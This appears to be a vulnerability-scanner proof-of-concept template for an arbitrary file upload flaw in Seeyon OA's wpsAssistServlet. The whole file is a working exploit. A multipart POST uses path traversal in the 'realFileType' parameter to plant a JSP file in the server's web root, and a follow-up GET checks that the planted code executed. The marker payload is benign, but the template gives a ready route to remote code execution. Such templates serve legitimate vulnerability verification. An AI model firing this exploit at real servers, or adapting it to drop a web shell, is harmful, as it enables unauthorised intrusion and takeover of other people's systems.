name: seeyon-wps-assist-servlet-upload
set:
  rfilename: randomLowercase(12)
  r2: randomInt(40000, 44800)
  r3: randomInt(40000, 44800)
  md5str: md5(rfilename)
  rboundary: randomLowercase(8)
rules:
  - method: POST
    path: "/seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/{{rfilename}}.jsp&fileId=2"
    headers:
      Content-Type: "multipart/form-data; boundary=WebKitFormBoundary{{rboundary}}"
    body: "--WebKitFormBoundary{{rboundary}}\r\nContent-Disposition: form-data; name=\"upload\"; filename=\"123.xls\"\r\nContent-Type: application/vnd.ms-excel\r\n\r\n<% out.println(\"{{md5str}}\");%>\r\n--WebKitFormBoundary{{rboundary}}--\r\n\r\n"
    expression: |
      response.status == 200 && response.body.bcontains(b'"code":') && response.body.bcontains(b'"data":') && response.body.bcontains(b'"officeTransResultFlag":') && response.body.bcontains(b'true')
  - method: GET
    path: "/{{rfilename}}.jsp"
    expression: |
      response.status == 200 && response.body.bcontains(bytes(md5str))
detail:
  author: 666